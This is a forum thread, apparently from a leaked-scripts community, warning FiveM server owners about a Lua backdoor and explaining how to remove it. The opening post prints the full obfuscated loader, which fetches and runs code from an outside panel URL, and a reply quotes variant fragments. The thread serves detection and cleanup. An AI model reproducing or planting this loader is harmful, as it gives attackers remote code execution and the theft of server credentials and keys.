Find Malware/Viruses in your assets, or leaked assets

posted 23-01-2024 21:23 2.336 views 13 replies
milanwillet
0 Posts
714 Credits
N/A Since
#1 2.336 views 13 replies
What this Malware/RAT doing ?
it generates obfuscated shit code like this :


local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x54\x48\x4a\x58\x67\x37", function (mMXHvjYgMEtGKcHqzKgfgEIRqKBgXRKwKfMaUTsiIbVjqVAIeJlcSKEMRZerHZUwyHKDxv, aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL) if (aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL == llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[6] or aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL == llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[5]) then return end llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[2]](llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[4][llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY[3]](aQDbadBFDtfjAPUkSJUlFAbsbNHyHbXjtqNrxoZgrtjGGWWcUawztmIKmsSbaHhHQTkICL))() end)

in every .lua file in your server also After this shit code is run, it will upload some javascript and override existing files within the system builders directory.

resources\[system]\[builders] <---- if you dont have this directory i wiil tell you what you can do to remove the malware

The code will start propagating itself within all of your resources and files within the FiveM server installation to make it difficult to remove.


At this stage, its armageddon and all files within the server are compromised meaning files can be downloaded, uploaded, edited and viewed, including but not limited to just the server.cfg, sql credentials or even steal your cfx license keys. They’re also able to run remote code on the server which leads to the last step. The MalScanner batch file in this repository aims to show you exactly where the infected code is.
HOW TO REMOVE IT ?

1. Import all the resources files in to your visual studio like this :
1674348038524.png

(Select your resources folder only!)
1674348121206.png
First Step DONE

2. Stop Your Server Clear your Cache and Search about this : = {"\


How to check all resources?
simple do as i will show you in picture
1674348345837.png
1674348374351.png

remove every kind of local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY =

3. DELETE The following resources because this shit overwrite the js files of this resources :
1) xsound
2) webpack
3) yarn

4. Redownload the resources from here :
FOR YARN AND WEBPACK : cfx-server-data/resources at master · citizenfx/cfx-server-data
FOR XSOUND : GitHub - Xogy/xsound: Improved audio library for FiveM

5 Be sure you dont have any kind of local llENlQLdvCuYuSHyRigzqdmDowZTFkiYZcFjumrxNEGcwdKjdvRtUnwRKMnSteYlQndlVY = {"\ (the its random for every victim this is just an example)
in your resources because it will spread again and again and again

I have supplied two tools, one is a malware scanner that can searches for obfuscated code like above, just place it in your resources folder and run as administrator, and the network block if for vps/homehosted, once run it will block network connection to the known panels these hackers use to ruin your assets

6. Start Your server !
replies (13)
leaks4ever
162 Posts
2,097 Credits
Jun 2023 Since
#1
⚠️[B][I]Update this post⚠️:

local tRThqOBgMbtFexNnFcNDZnrlVSKInPoStSPWYGePmyybWSuonqViBEpnfLTXRsNDghAamW = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74",

local bPONongFTdvYbmSYWxNLEaXZCxywuNEcypwOkhxkpkMoEENjDEqPNGTjyQLIPGnGtPQzrI = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65",


You don't need the full code... 👆

And the codes are always different for different people
so these codes will probably not find them....
[/I][/B]
This will be generated at the end of your scripts.
And they stop working if you didn't use mysql-async
👇

server_scripts { '@mysql-async/lib/MySQL.lua' }


DELETE The following resources because this shit overwrite the js files of this resources :
1) xsound
2)webpack
3)yarn
4)screenshot-basic
rstreetz
7 Posts
84 Credits
Sep 2023 Since
#2
images not showing my brother
rstreetz
7 Posts
84 Credits
Sep 2023 Since
#3
Question: Can malware like this add lines to encrypted code?
milanwillet
87 Posts
714 Credits
Dec 2023 Since
#4

rstreetz,
images not showing my brother



rstreetz,
Question: Can malware like this add lines to encrypted code?

not that I'm aware of bro
rstreetz
7 Posts
84 Credits
Sep 2023 Since
#5
Probably best if I just reinstall them but I did follow all your steps. Thanks
milanwillet
87 Posts
714 Credits
Dec 2023 Since
#6

rstreetz,
Probably best if I just reinstall them but I did follow all your steps. Thanks

tbh if its encrypted it wouldnt allow anything to be written in them, even if it could i don't think it would call the functions its trying to trigger
itssoso1998
67 Posts
62 Credits
Feb 2024 Since
#7
Thanks for sharing , that's cool
milanwillet
87 Posts
714 Credits
Dec 2023 Since
#8

itssoso1998,
Thanks for sharing , that's cool

you're welcome just trying to lookout for you all <3
milanwillet
87 Posts
714 Credits
Dec 2023 Since
#9
ALSO WHEN DOWNLOADING ANY LEAKED SCRIPTS

SEARCH FOLDER FOR PerformHTTP
HunterXII
319 Posts
2,695 Credits
Feb 2023 Since
#10
This is a must have in your dev tool box.
jipo.
8 Posts
351 Credits
Feb 2024 Since
#11
thanks a lot sir very useful !
FreakZone
83 Posts
10,687 Credits
May 2021 Since
#12
very useful thx for this
xbiimbiim
31 Posts
113 Credits
Mar 2022 Since
#13
thanx men!
we need all this tips in fivem . ;)

You must be logged in to reply

Login Register